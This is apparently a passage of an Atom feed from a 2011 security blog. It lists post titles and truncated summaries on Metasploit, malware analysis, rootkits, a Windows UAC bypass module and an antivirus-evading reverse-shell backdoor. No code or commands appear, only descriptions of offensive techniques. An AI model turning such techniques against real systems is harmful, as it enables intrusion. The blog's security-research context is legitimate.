Testing IDS solutions has always been a  nightmare. Just </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1291352882809766451/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/tomahawk-your-idsfirewall-best-friend.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1291352882809766451'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1291352882809766451'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/tomahawk-your-idsfirewall-best-friend.html' title='Tomahawk, your IDS/Firewall Best Friend'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2429589920235041791</id><published>2011-06-22T01:26:00.001+08:00</published><updated>2011-06-22T01:32:06.636+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Introducing DOM Snitch, our passive in-the-browser reconnaissance tool</title><summary type='text'>Every day modern web applications are becoming increasingly  sophisticated, and as their complexity grows so does their attack  surface. Previously we introduced open source tools such as Skipfish and Ratproxy to assist developers in understanding and securing these applications.
As existing tools focus mostly on testing server-side code, today we are happy to introduce DOM Snitch  — an </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2429589920235041791/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/introducing-dom-snitch-our-passive-in.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2429589920235041791'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2429589920235041791'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/introducing-dom-snitch-our-passive-in.html' title='Introducing DOM Snitch, our passive in-the-browser reconnaissance tool'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1712788865909750360</id><published>2011-06-21T22:38:00.002+08:00</published><updated>2011-06-22T01:40:25.700+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Metasploit 3.7.2 adds 11 new exploits</title><summary type='text'>Metasploit is a free, open source penetration testing solution.

Metasploit now ships with 698 exploit modules, 358 auxiliary modules, and 54 post modules.

11 new exploits, 1 new auxiliary module, and 15 new post modules have been added since the last release.

New features include remote registry commands for Meterpreter, import  parsers moved to nokogiri streaming parsers (for quicker parsing </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1712788865909750360/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/metasploit-372-adds-11-new-exploits.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1712788865909750360'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1712788865909750360'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/metasploit-372-adds-11-new-exploits.html' title='Metasploit 3.7.2 adds 11 new exploits'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6067511354303397724</id><published>2011-06-21T22:30:00.001+08:00</published><updated>2011-06-22T01:41:14.854+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>IM worm targeting Brazilian Facebook users</title><summary type='text'>There’s nothing new in Brazilian cybercriminals exploiting social  networks to distribute their malicious code. Orkut was first, followed  by Twitter, and now it’s Facebook’s turn.
Facebook is becoming increasingly popular in Brazil and we are  witnessing more and more Brazilian bad guys switching their focus to it.  We received some proof this weekend: a Brazilian instant message (IM)  worm </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6067511354303397724/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/im-worm-targeting-brazilian-facebook.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6067511354303397724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6067511354303397724'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/im-worm-targeting-brazilian-facebook.html' title='IM worm targeting Brazilian Facebook users'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7449415786613195003</id><published>2011-06-21T22:20:00.001+08:00</published><updated>2011-06-21T22:32:37.254+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>LulzSec Suspect Taken Into Custody</title><summary type='text'>Rumors and news regarding hacker group LulzSec have been afloat on Twitter today.

The rumors circle around this Pastebin post which claims that LulzSec had acquired the UK's 2011 census data. Note that anybody can post to pastebin.com.

Soon after, news came that Scotland Yard has arrested a 19-year-old in Essex.

Should be interesting to see what comes next…

Will the UK's census data be </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7449415786613195003/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/lulzsec-suspect-taken-into-custody.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7449415786613195003'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7449415786613195003'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/lulzsec-suspect-taken-into-custody.html' title='LulzSec Suspect Taken Into Custody'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7615696459476058910</id><published>2011-06-21T01:38:00.000+08:00</published><updated>2011-06-21T01:38:37.248+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Backdoored'/><title type='text'>Creating a 13 line backdoor worry free of A/V</title><summary type='text'>When writing the SET interactive shell for the Social-Engineer  Toolkit, I had to ponder what the best route in creating a flexible  reverse shell. This backdoor had to be a familiar programming language  (to me) and be modular for me to add new things onto it. Python being my  strongest language posed some significant challenges as it was not a  compiled language. 
Fortunately there is a way to </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7615696459476058910/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/creating-13-line-backdoor-worry-free-of.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7615696459476058910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7615696459476058910'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/creating-13-line-backdoor-worry-free-of.html' title='Creating a 13 line backdoor worry free of A/V'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5167679411006119334</id><published>2011-06-19T23:20:00.000+08:00</published><updated>2011-06-19T23:20:29.810+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Searching the Registry using PowerShell</title><summary type='text'> 
On a cold and rainy Thursday morning, I thought that it would be a good time to write a post on searching the Windows registry using PowerShell.  In an Incident Response scenario you may want or need to do some live analysis on a compromised system, and part of this analysis may be to search the registry for some sort of artifact that is appropriate.  Using PowerShell can help you do this in a </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5167679411006119334/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/searching-registry-using-powershell.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5167679411006119334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5167679411006119334'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/06/searching-registry-using-powershell.html' title='Searching the Registry using PowerShell'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4979186686940532258</id><published>2011-04-11T02:22:00.001+08:00</published><updated>2011-06-19T23:38:02.580+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>pooftooph-the-bluetooth-spoofer-v0-4-released</title><summary type='text'>Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. 
Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are in Discoverable Mode (specifically the same Address).



Spooftooph </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4979186686940532258/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/04/pooftooph-bluetooth-spoofer-v0-4.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4979186686940532258'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4979186686940532258'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/04/pooftooph-bluetooth-spoofer-v0-4.html' title='pooftooph-the-bluetooth-spoofer-v0-4-released'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5762021253241982978</id><published>2011-04-07T03:24:00.001+08:00</published><updated>2011-06-19T23:39:59.727+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Movie'/><title type='text'>Tron Legacy</title><summary type='text'>   
I spent a half year writing software art to generate special effects for Tron Legacy, working at Digital Domain with Bradley "GMUNK" Munkowitz, Jake Sargeant, and David "dlew" Lewandowski. This page has taken a long time to be published because I've had to await clearance. A lot of my team's work was done using Adobe software and Cinema 4D. The rest of it got written in C++ using </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5762021253241982978/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/04/tron-legacy.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5762021253241982978'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5762021253241982978'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/04/tron-legacy.html' title='Tron Legacy'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6139162566250963881</id><published>2011-03-11T14:57:00.001+08:00</published><updated>2011-06-19T23:42:50.856+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Desynchronization Issues in Windows Message Handling</title><summary type='text'>
This week, Microsoft issued MS11-012 to resolve yet another batch of vulnerabilities in win32k.sys. The bulletin addressed three elevation of privilege vulnerabilities in window class data handling (somewhat related to those patched in MS10-073) and an additional two in window message handling. The latter were quite interesting as they were not your typical vulnerability class, but rather subtle</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6139162566250963881/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/03/desynchronization-issues-in-windows.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6139162566250963881'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6139162566250963881'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/03/desynchronization-issues-in-windows.html' title='Desynchronization Issues in Windows Message Handling'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-VyyG8N0yl0Y/TXnHTbzatlI/AAAAAAAAAJI/7fpEfmj5XNQ/s72-c/flow.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8208009505706602933</id><published>2011-02-27T17:12:00.001+08:00</published><updated>2011-06-19T23:57:47.344+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><title type='text'>Peeling Apart TDL4 and Other Seeds of Evil Part I</title><summary 
type='text'>This is the first in an intended series discussing analysis on a compromised XP SP3 machine. Multiple malware components were found on the system and I shall try to describe the analysis processes I used in an attempt to provide something of interest.

Emerging Threats signature-based alert

The first indicator of any issue was the firing of an Emerging Threats signature ET 2010823 on an </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8208009505706602933/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/02/peeling-apart-tdl4-and-other-seeds-of_27.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8208009505706602933'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8208009505706602933'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/02/peeling-apart-tdl4-and-other-seeds-of_27.html' title='Peeling Apart TDL4 and Other Seeds of Evil Part I'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_M2IZWfA-R60/TQr6lZXKoeI/AAAAAAAAAFI/0ICFGfLZnIE/s72-c/memorydd_bat.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3140414679609889269</id><published>2011-02-27T17:01:00.001+08:00</published><updated>2011-06-20T00:09:54.456+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><title type='text'>Peeling Apart TDL4 and Other Seeds of Evil Part II</title><summary type='text'>Peeling Apart TDL4 and Other Seeds of Evil Part II

(please excuse the lousy formatting, blogger doesn't handle these posts too well)

This is the second in an intended series discussing analysis on a compromised XP SP3 machine. Multiple malware components were found on the system and I shall try to describe the analysis processes I used in an attempt to provide something of interest. In some </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3140414679609889269/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/02/peeling-apart-tdl4-and-other-seeds-of.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3140414679609889269'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3140414679609889269'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/02/peeling-apart-tdl4-and-other-seeds-of.html' title='Peeling Apart TDL4 and Other Seeds of Evil Part II'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='https://lh4.googleusercontent.com/-uY7YipocB2M/TWlohst84lI/AAAAAAAAAF4/JW0ieKxg7WY/s72-c/clickserver_parms.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4152793195542763016</id><published>2011-01-17T12:15:00.013+08:00</published><updated>2011-06-20T00:11:07.169+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><title type='text'>Good Memory Adware Removal Instructions</title><summary type='text'>Good Memory is a rogue application. 
A rogue application tries to trick you by displaying false-positive or misleading scan results, which claim that your computer has a problem or is infected with viruses or trojans, but you will not be able to fix it before you purchase.

Variants of the rogue defragmenter:

* Fast Disk
* Disk OK
* My Disk
* Memory Fixer
* HDD Fix
* Scanner
* HDD Low
* Disk </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4152793195542763016/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/good-memory-adware-removal-instructions.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4152793195542763016'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4152793195542763016'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/good-memory-adware-removal-instructions.html' title='Good Memory Adware Removal Instructions'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-9085067873155068047</id><published>2011-01-13T11:16:00.002+08:00</published><updated>2011-06-20T00:13:25.355+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><title type='text'>In-memory extraction of SSL private keys</title><summary type='text'> by Nicolas Collignon et Jean-Baptiste Aviat (04/06/10) ------------[ In-memory extraction of SSL private keys ]----------------


This article is available in French at passe-partout.html.fr.

The tool passe-partout presented throughout this tip can be found at passe-partout.


--[ 1. Introduction ]---------------------------------------------------

Asymmetric cryptography usage is growing for </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/9085067873155068047/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/in-memory-extraction-of-ssl-private.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/9085067873155068047'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/9085067873155068047'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/in-memory-extraction-of-ssl-private.html' title='In-memory extraction of SSL private keys'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1708573124113565481</id><published>2011-01-03T17:13:00.002+08:00</published><updated>2011-06-20T00:18:52.083+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module</title><summary type='text'>Happy New Year everyone! Here is a nice new addition to bypass UAC  through meterpreter. It all came about when Kevin Mitnick was on a  pentest and needed to bypass Windows 7 UAC. We stumbled upon an old post  from Leo Davidson  (http://www.pretentiousname.com/misc/win7_uac_whitelist2.html) on  bypassing Windows UAC. 
This method takes advantage of process injection  that has a trusted Windows </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1708573124113565481/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/happy-new-year-everyone-here-is-nice.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1708573124113565481'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1708573124113565481'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/happy-new-year-everyone-here-is-nice.html' title='Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1601548758214027646</id><published>2011-01-03T03:41:00.001+08:00</published><updated>2011-06-20T01:08:59.185+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rootkits'/><title type='text'>Ring 0f Fire : Rootkits and DKOM</title><summary type='text'>Many books and papers cover the subject of Rootkits. I wrote this article to describe my first steps.
Here, you will learn what a rootkit is and how it works. You will also find an attack using DKOM. For this article I’m using:
Windows XP SP3
WDK Windows Driver Kit
Some debuggers: WinDbg, DebugView
Coffee and good cakes
1. Rootkits1.1. What is a Rootkit?First and foremost, a rootkit is not a  </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1601548758214027646/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/ring-0f-fire-rootkits-and-dkom.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1601548758214027646'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1601548758214027646'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/ring-0f-fire-rootkits-and-dkom.html' title='Ring 0f Fire : Rootkits and DKOM'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8991544152778148491</id><published>2011-01-02T18:10:00.004+08:00</published><updated>2011-06-20T01:14:46.426+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Configuration Setting: safemodehack</title><summary type='text'>This tries to solve bug 179 where DokuWiki can not write to directories it created itself. It does so by using FTP to log into your server and creating the directory that way. It requires the FTP PHP module to be installed on the server. 
Type: Boolean
Default: 0
As the name suggests, this is a hack and not recommended. Safemode itself is a setting that even the developers of PHP despise, it will</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8991544152778148491/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/configuration-setting-safemodehack.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8991544152778148491'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8991544152778148491'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/01/configuration-setting-safemodehack.html' title='Configuration Setting: safemodehack'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-550083250515628684</id><published>2010-12-29T01:18:00.006+08:00</published><updated>2011-06-20T01:16:17.453+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><title type='text'>Reverse Engineering Malware</title><summary type='text'>I recently got the opportunity to sit in on (fellow SANS instructor) Lenny Zeltser's "Reverse Engineering Malware" class.  It's a terrific course, and I highly recommend it.


During  the material on memory analysis, we were comparing the output of  "volatility pslist" and "volatility psscan2".  It's relatively  straightforward for rootkits to hide themselves from pslist, but psscan2  does a much</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/550083250515628684/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/reverse-engineering-malware.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/550083250515628684'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/550083250515628684'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/reverse-engineering-malware.html' title='Reverse Engineering Malware'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5211946291881673707</id><published>2010-12-22T07:47:00.001+08:00</published><updated>2011-06-20T01:26:41.057+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><title type='text'>Administrator account VS. SYSTEM account</title><summary type='text'>I've encountered one trojan who ran already as Administrator and tried  to run privilege escalation exploit against himself, so he can run as  SYSTEM.
This is what made me write this post : 

Let's say there are 2 programs vulnerable to remote-code-execution bug.
1. One is running as SYSTEM
2. One is running as Administrator.

Little pre-post-information regarding exploitation : If you run  your </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5211946291881673707/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/administrator-account-vs-system-account.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5211946291881673707'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5211946291881673707'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/12/administrator-account-vs-system-account.html' title='Administrator account VS. SYSTEM account'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Kde3g35OnUQ/S0iEdNKFS3I/AAAAAAAAAEQ/hQGyaBKJILI/s72-c/at1.jpg' height='72' 